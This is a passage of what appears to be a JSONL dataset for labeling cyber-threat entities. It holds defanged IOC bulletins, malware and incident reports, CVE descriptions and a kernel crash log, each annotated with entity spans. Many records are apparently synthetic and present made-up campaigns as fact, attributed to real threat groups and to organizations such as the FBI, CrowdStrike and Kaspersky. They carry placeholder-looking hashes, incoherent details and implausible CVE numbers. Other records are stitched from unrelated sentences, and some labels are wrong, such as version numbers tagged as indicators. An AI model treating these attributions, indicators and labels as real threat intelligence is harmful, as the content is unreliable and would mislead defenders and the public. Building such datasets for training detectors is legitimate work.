it\ndoes not support SMP and consequently doesn't use split PT locks.\n\n[1] hxxps://lore[ . ]kernel[ . ]org/all/1bbfcc7f-f222-45a5-ac44-c5a1381c596d@redhat.com/", "spans": {"Indicator: https://lore.kernel.org/all/1bbfcc7f-f222-45a5-ac44-c5a1381c596d@redhat.com/": [[3677, 3761]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1321, 1325]], "System: KVM": [[1326, 1329]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-45024"}} {"text": "However , it does n't request permissions like BIND_ADMIN . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns . 
The malicious updaters were hosted on the official liveupdate01s[.]asus[.]com and liveupdate01[.]asus[.]com ASUS update servers . Given the widespread adoption of Citrix in enterprises globally , we suspect the number of impacted organizations is far greater and in several sectors .", "spans": {"Indicator: liveupdate01s.asus.com": [[249, 275]], "Indicator: liveupdate01.asus.com": [[280, 305]], "Organization: ASUS": [[306, 310]]}, "info": {"id": "cyberner_stix_train_007701", "source": "defanged_augment"}} {"text": "Sandworm, attributed to Russia's GRU Unit 74455 and tracked by Microsoft as Seashell Blizzard, deployed destructive malware against Ukrainian energy infrastructure. The group used Industroyer2 to target industrial control systems at substations, alongside CaddyWiper (SHA256 a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7) to destroy data on Windows systems. The attack was coordinated with OrcShred wiper for Linux and Solaris targets with hash c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9. C2 infrastructure was hosted at 91 [ . ] 245 [ . ] 228 [ . ] 56 and 176[.]57[.]215[.]92. Malicious scripts were deployed to /var/tmp/.update.sh and /opt/oracle/extproc.sh. The Industroyer2 configuration targeted IEC-104 protocol on ports 2404 and contained hardcoded IP addresses of substation RTUs at 10[.]25[.]100[.]1 and 10 [ . ] 25 [ . ] 100 [ . 
] 2.", "spans": {"Organization: GRU": [[33, 36]], "Organization: Microsoft": [[63, 72]], "Malware: Industroyer2": [[180, 192], [706, 718]], "Malware: CaddyWiper": [[256, 266]], "Indicator: a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7": [[275, 339]], "System: Windows": [[360, 367]], "Malware: OrcShred": [[409, 417]], "System: Linux": [[428, 433]], "System: Solaris": [[438, 445]], "Indicator: c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9": [[464, 528]], "Indicator: 91.245.228.56": [[562, 593]], "Indicator: 176.57.215.92": [[598, 617]], "Indicator: 10.25.100.1": [[832, 849]], "Indicator: 10.25.100.2": [[854, 883]]}, "info": {"id": "malware_00022", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 194[.]81[.]11[.]8, the CrowdStrike IR team identified BatLoader running as C:\\Users\\Public\\Documents\\sam.hive. The threat actor, believed to be MuddyWater, used Burp Suite for credential harvesting and LaZagne for lateral movement. Exfiltrated data was sent to cdn-mail[.]info and authcdn[.]link. The initial dropper (SHA1: 8d6918f4f6e82b4e86d9a7abf67ec9341847e5da) was delivered via a phishing email from updates@auth-check[.]org. A second C2 node was observed at 62 [ . ] 155 [ . ] 216 [ . ] 253, with a persistence mechanism writing to /home/user/.config/shell.php.", "spans": {"Indicator: 194.81.11.8": [[64, 81]], "Organization: CrowdStrike": [[87, 98]], "Malware: BatLoader": [[118, 127]], "Indicator: cdn-mail.info": [[325, 340]], "Indicator: authcdn.link": [[345, 359]], "Indicator: 8d6918f4f6e82b4e86d9a7abf67ec9341847e5da": [[388, 428]], "Indicator: updates@auth-check.org": [[470, 494]], "Indicator: 62.155.216.253": [[529, 561]]}, "info": {"id": "synth_v2_00282", "source": "defanged_augment"}} {"text": "] com and ora.studiolegalebasili [ . 
China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Poison Ivy is a remote access tool that is freely available for download from its official web site at www[ . ]poisonivy-rat[ . ]com .", "spans": {"Malware: China Chopper": [[37, 50]], "Malware: Poison Ivy": [[211, 221]], "Indicator: www.poisonivy-rat.com": [[314, 343]]}, "info": {"id": "cyberner_stix_train_003226", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-24392 is a critical buffer overflow affecting Windows Server 2019. FBI confirmed active exploitation by Charming Kitten in the wild. Exploitation delivers ShadowPad (SHA1: 92b73a73036a93c3213e153aaf6a65704f6a0553) which is dropped to C:\\Program Files\\Common Files\\shell.php. The exploit payload is hosted at hxxp://backupdata[ . ]link/collect and communicates to 180 [ . ] 44 [ . ] 159 [ . ] 144 for C2.", "spans": {"Vulnerability: CVE-2024-24392": [[24, 38]], "Vulnerability: buffer overflow": [[53, 68]], "System: Windows Server 2019": [[79, 98]], "Organization: FBI": [[100, 103]], "Malware: ShadowPad": [[188, 197]], "Indicator: 92b73a73036a93c3213e153aaf6a65704f6a0553": [[205, 245]], "Indicator: hxxp://backupdata.link/collect": [[341, 375]], "Indicator: 180.44.159.144": [[396, 428]]}, "info": {"id": "synth_v2_00785", "source": "defanged_augment"}} {"text": "MSEdgeRedirect is a tool to redirect news, search, widgets, weather, and more to a user's default browser. MSEdgeRedirect versions before 0[.]5[.]0[.]1 are vulnerable to Remote Code Execution via specifically crafted URLs. This vulnerability requires user interaction and the acceptance of a prompt. With how MSEdgeRedirect is coded, parameters are impossible to pass to any launched file. However, there are two possible scenarios in which an attacker can do more than a minor annoyance. 
In Scenario 1 (confirmed), a user visits an attacker controlled webpage; the user is prompted with, and downloads, an executable payload; the user is prompted with, and accepts, the aforementioned crafted URL prompt; and RCE executes the payload the user previously downloaded, if the download path is successfully guessed. In Scenario 2 (not yet confirmed), a user visits an attacked controlled webpage; the user is prompted with, and accepts, the aforementioned crafted URL prompt; and a payload on a remote, attacker controlled, SMB server is executed. The issue was found in the _DecodeAndRun() function, in which I incorrectly assumed _WinAPI_UrlIs() would only accept web resources. Unfortunately, file:/// passes the default _WinAPI_UrlIs check(). File paths are now directly checked for and must fail. There is no currently known exploitation of this vulnerability in the wild. A patched version, 0[.]5[.]0[.]1, has been released that checks for and denies these crafted URLs. There are no workarounds for this issue. Users are advised not to accept any unexpected prompts from web pages.", "spans": {"Indicator: 0.5.0.1": [[138, 151], [1394, 1407]], "Vulnerability: Remote Code Execution": [[170, 191]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-43844"}} {"text": "Vulnerability Advisory: CVE-2024-36290 is a critical remote code execution affecting Zyxel USG. Trend Micro confirmed active exploitation by Forest Blizzard in the wild. Exploitation delivers Lumma Stealer (SHA256: e73c5523060665c8e2b5559518acff04518f6b43f0870d44efb3cf4abd61592d) which is dropped to /etc/cron.d/svchost.exe. The exploit payload is hosted at hxxps://login-relay[ . ]cc/secure/token and communicates to 172 [ . ] 51 [ . ] 226 [ . 
] 181 for C2.", "spans": {"Vulnerability: CVE-2024-36290": [[24, 38]], "Vulnerability: remote code execution": [[53, 74]], "System: Zyxel USG": [[85, 94]], "Organization: Trend Micro": [[96, 107]], "Malware: Lumma Stealer": [[192, 205]], "Indicator: e73c5523060665c8e2b5559518acff04518f6b43f0870d44efb3cf4abd61592d": [[215, 279]], "Indicator: hxxps://login-relay.cc/secure/token": [[359, 398]], "Indicator: 172.51.226.181": [[419, 451]]}, "info": {"id": "synth_v2_00794", "source": "defanged_augment"}} {"text": "Blog Post by Kaspersky GReAT: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-19065 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from support@document-share[.]link delivering RedLine Stealer. Post-compromise, the attackers deploy IcedID and use Hashcat for reconnaissance. C2 infrastructure includes 10 [ . ] 78 [ . ] 242 [ . ] 105 and portal-edge[.]cc. A staging server at hxxp://relaydata[.]io/collect hosts additional tooling. 
Key artifact: C:\\Windows\\System32\\csrss.exe (SHA256: 21b1afd43645efe4e5eb322c5ffe88cc4b18270351ecd47c80f7c75bd84b1c34).", "spans": {"Organization: Kaspersky GReAT": [[13, 28]], "Vulnerability: CVE-2025-19065": [[132, 146]], "System: MOVEit Transfer": [[155, 170]], "Indicator: support@document-share.link": [[246, 275]], "Malware: RedLine Stealer": [[287, 302]], "Malware: IcedID": [[342, 348]], "Indicator: 10.78.242.105": [[412, 443]], "Indicator: portal-edge.cc": [[448, 464]], "Indicator: http://relaydata.io/collect": [[486, 515]], "Indicator: 21b1afd43645efe4e5eb322c5ffe88cc4b18270351ecd47c80f7c75bd84b1c34": [[595, 659]]}, "info": {"id": "synth_v2_01652", "source": "defanged_augment"}} {"text": "TG-3390 : 72[.]11[.]141[.]133 .", "spans": {"Indicator: 72.11.141.133": [[10, 29]]}, "info": {"id": "cyberner_stix_train_001765", "source": "defanged_augment"}} {"text": "The second type of apps reveals an evolution in the author 's tactics . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . The ELMER variant 6c33223db475f072119fe51a2437a542 beaconed to the C2 IP address 121 [ . ] 127 [ . ] 249 [ . ] 74 over port 443 . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": {"Malware: rastls.dll": [[165, 175]], "Malware: Sycmentec.config files": [[180, 202]], "Malware: ELMER": [[209, 214]], "Indicator: 6c33223db475f072119fe51a2437a542": [[223, 255]], "Indicator: 121.127.249.74": [[286, 318]], "Malware: AgentTesla remote access trojan ( RAT": [[366, 403]]}, "info": {"id": "cyberner_stix_train_000502", "source": "defanged_augment"}} {"text": "IOC Bulletin - SystemBC Campaign:\nNetwork Indicators:\n- 201[.]120[.]184[.]182\n- 45[.]234[.]87[.]159\n- 10[.]173[.]241[.]229\n- secure-sync[.]com\n- cache-node[.]site\nURLs:\n- hxxp://static-node[.]info/portal/verify\n- hxxp://synclogin[ . 
]top/wp-content/uploads/doc.php\nEmail Senders:\n- notification@urgent-notice[.]online\n- helpdesk@auth-check[.]org\nFile Indicators:\n- SHA1: f0fbf39e7c2e6911cafb7689ddde128ebb075953\n- MD5: 7aec4ec51ae460a3260d45f1915d37b6\n- Drop path: C:\\Users\\admin\\Desktop\\csrss.exe", "spans": {"Malware: SystemBC": [[15, 23]], "Indicator: 201.120.184.182": [[56, 77]], "Indicator: 45.234.87.159": [[80, 99]], "Indicator: 10.173.241.229": [[102, 122]], "Indicator: secure-sync.com": [[125, 142]], "Indicator: cache-node.site": [[145, 162]], "Indicator: http://static-node.info/portal/verify": [[171, 210]], "Indicator: http://synclogin.top/wp-content/uploads/doc.php": [[213, 264]], "Indicator: notification@urgent-notice.online": [[282, 317]], "Indicator: helpdesk@auth-check.org": [[320, 345]], "Indicator: f0fbf39e7c2e6911cafb7689ddde128ebb075953": [[371, 411]], "Indicator: 7aec4ec51ae460a3260d45f1915d37b6": [[419, 451]]}, "info": {"id": "synth_v2_01444", "source": "defanged_augment"}} {"text": "Here is an approximate diagram of the opcode data structure : Figure 5 . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia . If for a particular reason you need them , reach out to us at threatintel@eset[.]com . Also , ideology as a motivator could mean your group is the target of nation states .", "spans": {"Organization: group": [[309, 314]], "Organization: nation states": [[332, 345]], "Indicator: eset.com": [[249, 259]]}, "info": {"id": "cyberner_stix_train_006677", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Sharphound artifacts at /etc/cron.d/winlogon.exe. Memory dump analysis confirmed execution of Certutil. Registry modifications pointed to persistence via /usr/local/bin/agent.py. Network forensics identified connections to 22 [ . ] 109 [ . ] 195 [ . ] 236 and cloud-edge[ . ]live. Email headers traced the initial vector to alert@document-share[.]link. 
File C:\\ProgramData\\taskhost.exe (SHA1: 213fe93b81928609f1b06209c4151478790cda64) was identified as the initial dropper. A staging URL hxxps://relay-gateway[.]io/api/v2/auth resolved to 49[.]9[.]173[.]37. Secondary artifact hash: SHA256: 57d7e72f63a13cd53260efd61521680f35f37bc1ba68bdad5736b28ac80a4420.", "spans": {"Indicator: 22.109.195.236": [[295, 327]], "Indicator: cloud-edge.live": [[332, 351]], "Indicator: alert@document-share.link": [[396, 423]], "Indicator: 213fe93b81928609f1b06209c4151478790cda64": [[465, 505]], "Indicator: https://relay-gateway.io/api/v2/auth": [[560, 598]], "Indicator: 49.9.173.37": [[611, 628]], "Indicator: 57d7e72f63a13cd53260efd61521680f35f37bc1ba68bdad5736b28ac80a4420": [[663, 727]]}, "info": {"id": "synth_v2_01184", "source": "defanged_augment"}} {"text": "Symantec detected a multi-stage attack chain. The initial phishing email from support@credential-check[.]site contained a link to hxxp://backupcdn[ . ]net/assets/js/payload.js. This redirected to hxxps://backup-cloud[.]live/wp-content/uploads/doc.php on relaystorage[ . ]live. A secondary email from hr@document-share[ . ]link pointed to hxxp://syncsecure[.]tech/download/update.exe which delivered WarmCookie. The final payload callback was hxxps://updateproxy[ . 
]club/wp-content/uploads/doc.php resolving to 192[.]162[.]9[.]96 via data-sync[.]link.", "spans": {"Organization: Symantec": [[0, 8]], "Indicator: support@credential-check.site": [[78, 109]], "Indicator: hxxp://backupcdn.net/assets/js/payload.js": [[130, 175]], "Indicator: https://backup-cloud.live/wp-content/uploads/doc.php": [[196, 250]], "Indicator: relaystorage.live": [[254, 275]], "Indicator: hr@document-share.link": [[300, 326]], "Indicator: http://syncsecure.tech/download/update.exe": [[338, 382]], "Malware: WarmCookie": [[399, 409]], "Indicator: hxxps://updateproxy.club/wp-content/uploads/doc.php": [[442, 497]], "Indicator: 192.162.9.96": [[511, 529]], "Indicator: data-sync.link": [[534, 550]]}, "info": {"id": "synth_v2_01745", "source": "defanged_augment"}} {"text": "When a suitable .exe file candidate is found , it is copied into the malware installation folder ( for example , C : \\ProgramData ) . Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations . wsc_proxy[ . ]exe plugins-setup[ . ]exe SoftManager[ . ]exe GetEFA[.]exe . Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": {"Organization: CTU": [[184, 187]], "Indicator: wsc_proxy.exe": [[270, 287]], "Indicator: plugins-setup.exe": [[288, 309]], "Indicator: SoftManager.exe": [[310, 329]], "Indicator: GetEFA.exe": [[330, 342]], "Malware: Rhysida": [[345, 352]]}, "info": {"id": "cyberner_stix_train_003302", "source": "defanged_augment"}} {"text": "Recorded Future observed Turla, the Russian cyber espionage group also tracked as VENOMOUS BEAR, using compromised Starlink terminals as command-and-control relay points in Ukraine. The group deployed an updated version of the Snake implant that uses named pipes for inter-process communication and encrypts all traffic with ChaCha20. 
Network indicators included the domain cdn-analytics[.]cloud-delivery[.]net.", "spans": {"Organization: Recorded Future": [[0, 15]], "System: Starlink": [[115, 123]], "Malware: Snake": [[227, 232]], "Indicator: cdn-analytics.cloud-delivery.net": [[374, 410]]}, "info": {"id": "recordedfuture_00002", "source": "defanged_augment"}} {"text": "If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . The second , aptly titled \" kontrakt87[ . ]doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": {"Indicator: kontrakt87.doc": [[217, 235]], "Organization: telecommunications service": [[257, 283]], "Organization: MegaFon": [[298, 305]], "Organization: mobile phone operator": [[324, 345]]}, "info": {"id": "cyberner_stix_train_000282", "source": "defanged_augment"}} {"text": "It was executed via rundll32 commands such as : rundll32[ . ]exe “ C:\\Windows\\twain_64[.]dll ” .", "spans": {"Indicator: rundll32.exe": [[48, 64]], "Indicator: C:\\Windows\\twain_64.dll": [[67, 92]]}, "info": {"id": "cyberner_stix_train_007957", "source": "defanged_augment"}} {"text": "FBI published a threat intelligence report linking Granite Typhoon to a new campaign exploiting CVE-2023-33283 in MOVEit Transfer. The attackers deployed TrickBot via ADFind, establishing C2 communication with 192 [ . ] 26 [ . ] 245 [ . ] 44 and cloud-update[ . ]online. A secondary payload was downloaded from hxxp://gatewaylogin[ . ]site/callback. The malware binary (SHA1: 21acf9cca989c315cc10860dd3d9802687a3fc1d) was dropped to /dev/shm/update.dll. Phishing emails were sent from noreply@urgent-notice[ . ]online targeting enterprise users. A backup C2 server was identified at 38 [ . ] 124 [ . ] 16 [ . 
] 147.", "spans": {"Organization: FBI": [[0, 3]], "Vulnerability: CVE-2023-33283": [[96, 110]], "System: MOVEit Transfer": [[114, 129]], "Malware: TrickBot": [[154, 162]], "Indicator: 192.26.245.44": [[210, 241]], "Indicator: cloud-update.online": [[246, 269]], "Indicator: hxxp://gatewaylogin.site/callback": [[311, 348]], "Indicator: 21acf9cca989c315cc10860dd3d9802687a3fc1d": [[376, 416]], "Indicator: noreply@urgent-notice.online": [[485, 517]], "Indicator: 38.124.16.147": [[583, 614]]}, "info": {"id": "synth_v2_00067", "source": "defanged_augment"}} {"text": "XWiki Platform Old Core is a core package for XWiki Platform, a generic wiki platform. Prior to versions 13[.]1[.]0[.]5 and 14.3-rc-1, some resources are missing a check for inactive (not yet activated or disabled) users in XWiki, including the REST service. This means a disabled user can enable themselves using a REST call. On the same way some resources handler created by extensions are not protected by default, so an inactive user could perform actions for such extensions. This issue has existed since at least version 1.1 of XWiki for instance configured with the email activation required for new users. Now it's more critical for versions 11.3-rc-1 and later since the maintainers provided the capability to disable user without deleting them and encouraged using that feature. XWiki 14.3-rc-1 and XWiki 13.10.5 contain a patch. There is no workaround for this other than upgrading XWiki.", "spans": {"Indicator: 13.1.0.5": [[105, 119]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-36090"}} {"text": "] databit [ . The first attack started in early July with a ShimRatReporter payload . The POST URI is changed to /bbs/ search[ . ]asp ( as mentioned , earlier Aumlib variants used a POST URI of /bbs/ info[ . ]asp . ) The POST body is now encoded . 
FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": {"Malware: ShimRatReporter": [[60, 75]], "Indicator: search.asp": [[119, 133]], "Malware: Aumlib": [[159, 165]], "Indicator: info.asp": [[200, 212]], "Organization: FireEye": [[248, 255]]}, "info": {"id": "cyberner_stix_train_004284", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Dridex (MD5: 24a42dceaf8d2ced05517979fdab3652). Upon execution on Palo Alto PAN-OS, the sample creates /tmp/beacon.dll and injects into legitimate processes. Network analysis shows beaconing to 192[.]53[.]8[.]121 every 60 seconds and DNS queries to login-secure[ . ]club. The second stage was fetched from hxxps://gateway-update[.]top/collect and written to /var/tmp/update.dll. The payload uses Sliver-style techniques for defense evasion. A secondary hash (SHA256: 6412d63d36cf538bd4557562d5580fda77148dd599996175b852e3db158b977c) was extracted from the unpacked payload.", "spans": {"Malware: Dridex": [[25, 31]], "Indicator: 24a42dceaf8d2ced05517979fdab3652": [[38, 70]], "System: Palo Alto PAN-OS": [[91, 107]], "Indicator: 192.53.8.121": [[219, 237]], "Indicator: login-secure.club": [[274, 295]], "Indicator: https://gateway-update.top/collect": [[331, 367]], "Indicator: 6412d63d36cf538bd4557562d5580fda77148dd599996175b852e3db158b977c": [[492, 556]]}, "info": {"id": "synth_v2_00629", "source": "defanged_augment"}} {"text": "IOC Bulletin - Ryuk Campaign:\nNetwork Indicators:\n- 172[.]63[.]248[.]241\n- 219 [ . ] 5 [ . ] 15 [ . ] 52\n- 92[.]201[.]141[.]235\n- storageproxy[ . ]link\n- proxy-backup[.]link\nURLs:\n- hxxp://portalportal[ . ]com/download/update.exe\n- hxxps://portal-portal[ . ]club/portal/verify\nEmail Senders:\n- verify@mail-service[.]info\n- alert@account-update[ . 
]xyz\nFile Indicators:\n- MD5: 358de74077e360f643efce8b9904214d\n- SHA1: 58f8c74e2e01b9c0b063f4972b29620253fba227\n- Drop path: C:\\Windows\\Temp\\dropper.ps1", "spans": {"Malware: Ryuk": [[15, 19]], "Indicator: 172.63.248.241": [[52, 72]], "Indicator: 219.5.15.52": [[75, 104]], "Indicator: 92.201.141.235": [[107, 127]], "Indicator: storageproxy.link": [[130, 151]], "Indicator: proxy-backup.link": [[154, 173]], "Indicator: http://portalportal.com/download/update.exe": [[182, 229]], "Indicator: hxxps://portal-portal.club/portal/verify": [[232, 276]], "Indicator: verify@mail-service.info": [[294, 320]], "Indicator: alert@account-update.xyz": [[323, 351]], "Indicator: 358de74077e360f643efce8b9904214d": [[376, 408]], "Indicator: 58f8c74e2e01b9c0b063f4972b29620253fba227": [[417, 457]]}, "info": {"id": "synth_v2_01490", "source": "defanged_augment"}} {"text": "CSRF in Web Compliance Manager in Quest Policy Authority 8[.]1[.]2[.]200 allows remote attackers to force user modification/creation via a specially crafted link to the submitUser.jsp file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer", "spans": {"Indicator: 8.1.2.200": [[57, 72]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-35722"}} {"text": "IOC Bulletin - RedLine Stealer Campaign:\nNetwork Indicators:\n- 192 [ . ] 133 [ . ] 200 [ . ] 47\n- 172[.]164[.]217[.]38\n- 172 [ . ] 56 [ . ] 81 [ . ] 106\n- login-portal[.]link\n- auth-edge[ . ]site\nURLs:\n- hxxp://update-static[ . 
]dev/callback\n- hxxps://cache-api[.]cc/collect\nEmail Senders:\n- admin@urgent-notice[.]online\n- info@credential-check[.]site\nFile Indicators:\n- SHA1: d2bf09f886129b6fca988b8f2f7cf43950e9a613\n- SHA256: 2546eb6d93eb3abfea5139a395dba6467d4c751dcf7b8f32cf4a57e556cd7a34\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\update.dll", "spans": {"Malware: RedLine Stealer": [[15, 30]], "Indicator: 192.133.200.47": [[63, 95]], "Indicator: 172.164.217.38": [[98, 118]], "Indicator: 172.56.81.106": [[121, 152]], "Indicator: login-portal.link": [[155, 174]], "Indicator: auth-edge.site": [[177, 195]], "Indicator: hxxp://update-static.dev/callback": [[204, 241]], "Indicator: https://cache-api.cc/collect": [[244, 274]], "Indicator: admin@urgent-notice.online": [[292, 320]], "Indicator: info@credential-check.site": [[323, 351]], "Indicator: d2bf09f886129b6fca988b8f2f7cf43950e9a613": [[377, 417]], "Indicator: 2546eb6d93eb3abfea5139a395dba6467d4c751dcf7b8f32cf4a57e556cd7a34": [[428, 492]]}, "info": {"id": "synth_v2_01373", "source": "defanged_augment"}} {"text": "Blog Post by Symantec: Tracking TA505's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-46781 against Palo Alto PAN-OS deployments. The initial access vector involves spear-phishing emails from verify@phishing-domain[ . ]com delivering FormBook. Post-compromise, the attackers deploy PlugX and use SharpHound for reconnaissance. C2 infrastructure includes 20 [ . ] 240 [ . ] 135 [ . ] 24 and gateway-portal[.]cc. A staging server at hxxps://backupstorage[.]top/panel/index.html hosts additional tooling. 
Key artifact: /tmp/backdoor.elf (MD5: 56453130dc7b949fbbbe2172f0b21ef9).", "spans": {"Organization: Symantec": [[13, 21]], "Vulnerability: CVE-2020-46781": [[117, 131]], "System: Palo Alto PAN-OS": [[140, 156]], "Indicator: verify@phishing-domain.com": [[232, 262]], "Malware: FormBook": [[274, 282]], "Malware: PlugX": [[322, 327]], "Indicator: 20.240.135.24": [[394, 425]], "Indicator: gateway-portal.cc": [[430, 449]], "Indicator: hxxps://backupstorage.top/panel/index.html": [[471, 515]], "Indicator: 56453130dc7b949fbbbe2172f0b21ef9": [[580, 612]]}, "info": {"id": "synth_v2_01583", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: fix memory allocation in nvme_pr_read_keys()\n\nnvme_pr_read_keys() takes num_keys from userspace and uses it to\ncalculate the allocation size for rse via struct_size(). The upper\nlimit is PR_KEYS_MAX (64K).\n\nA malicious or buggy userspace can pass a large num_keys value that\nresults in a 4MB allocation attempt at most, causing a warning in\nthe page allocator when the order exceeds MAX_PAGE_ORDER.\n\nTo fix this, use kvzalloc() instead of kzalloc().\n\nThis bug has the same reasoning and fix with the patch below:\nhxxps://lore[.]kernel[.]org/linux-block/20251212013510.3576091-1-kartikey406@gmail.com/\n\nWarning log:\nWARNING: mm/page_alloc.c:5216 at __alloc_frozen_pages_noprof+0x5aa/0x2300 mm/page_alloc.c:5216, CPU#1: syz-executor117/272\nModules linked in:\nCPU: 1 UID: 0 PID: 272 Comm: syz-executor117 Not tainted 6.19.0 #1 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[.]16[.]3-0-ga6ed6b701f0a-prebuilt[.]qemu[.]org 04/01/2014\nRIP: 0010:__alloc_frozen_pages_noprof+0x5aa/0x2300 mm/page_alloc.c:5216\nCode: ff 83 bd a8 fe ff ff 0a 0f 86 69 fb ff ff 0f b6 1d f9 f9 c4 04 80 fb 01 0f 87 3b 76 30 ff 83 e3 01 75 09 c6 05 e4 f9 c4 04 01 <0f> 0b 48 c7 85 70 fe ff ff 00 00 00 00 e9 8f fd ff ff 31 c0 e9 0d\nRSP: 0018:ffffc90000fcf450 
EFLAGS: 00010246\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: 1ffff920001f9ea0\nRDX: 0000000000000000 RSI: 000000000000000b RDI: 0000000000040dc0\nRBP: ffffc90000fcf648 R08: ffff88800b6c3380 R09: 0000000000000001\nR10: ffffc90000fcf840 R11: ffff88807ffad280 R12: 0000000000000000\nR13: 0000000000040dc0 R14: 0000000000000001 R15: ffffc90000fcf620\nFS: 0000555565db33c0(0000) GS:ffff8880be26c000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000002000000c CR3: 0000000003b72000 CR4: 00000000000006f0\nCall Trace:\n \n alloc_pages_mpol+0x236/0x4d0 mm/mempolicy.c:2486\n alloc_frozen_pages_noprof+0x149/0x180 mm/mempolicy.c:2557\n ___kmalloc_large_node+0x10c/0x140 mm/slub.c:5598\n __kmalloc_large_node_noprof+0x25/0xc0 mm/slub.c:5629\n __do_kmalloc_node mm/slub.c:5645 [inline]\n __kmalloc_noprof+0x483/0x6f0 mm/slub.c:5669\n kmalloc_noprof include/linux/slab.h:961 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n nvme_pr_read_keys+0x8f/0x4c0 drivers/nvme/host/pr.c:245\n blkdev_pr_read_keys block/ioctl.c:456 [inline]\n blkdev_common_ioctl+0x1b71/0x29b0 block/ioctl.c:730\n blkdev_ioctl+0x299/0x700 block/ioctl.c:786\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x1bf/0x220 fs/ioctl.c:583\n x64_sys_call+0x1280/0x21b0 mnt/fuzznvme_1/fuzznvme/linux-build/v6.19/./arch/x86/include/generated/asm/syscalls_64.h:17\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0x71/0x330 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fb893d3108d\nCode: 28 c3 e8 46 1e 00 00 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007ffff61f2f38 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007ffff61f3138 RCX: 00007fb893d3108d\nRDX: 
0000000020000040 RSI: 00000000c01070ce RDI: 0000000000000003\nRBP: 0000000000000001 R08: 0000000000000000 R09: 00007ffff61f3138\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000001\nR13: 00007ffff61f3128 R14: 00007fb893dae530 R15: 0000000000000001\n ", "spans": {"Indicator: https://lore.kernel.org/linux-block/20251212013510.3576091-1-kartikey406@gmail.com/": [[588, 675]], "Indicator: rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org": [[978, 1030]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[933, 937]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-23244"}} {"text": "ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec С & C 2014–2015 : secondby[ . ]ru darkclub[.]net holerole[ . ]org googleapis.link 2015–2016 : test2016[ . ]ru blackstar[.]pro synchronize[.]pw lineout[.]pw sync-weather[.]pw The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia .", "spans": {"Malware: Android version": [[308, 323]], "Indicator: ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c": [[0, 64]], "Indicator: e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec": [[65, 129]], "Indicator: secondby.ru": [[148, 163]], "Indicator: darkclub.net": [[164, 178]], "Indicator: holerole.org": [[179, 195]], "Indicator: test2016.ru": [[224, 239]], "Indicator: blackstar.pro": [[240, 255]], "Indicator: synchronize.pw": [[256, 272]], "Indicator: lineout.pw": [[273, 285]], "Indicator: sync-weather.pw": [[286, 303]]}, "info": {"id": "cyberner_stix_train_001911", "source": "defanged_augment"}} {"text": "Modified DLL file ( goopdate[ . 
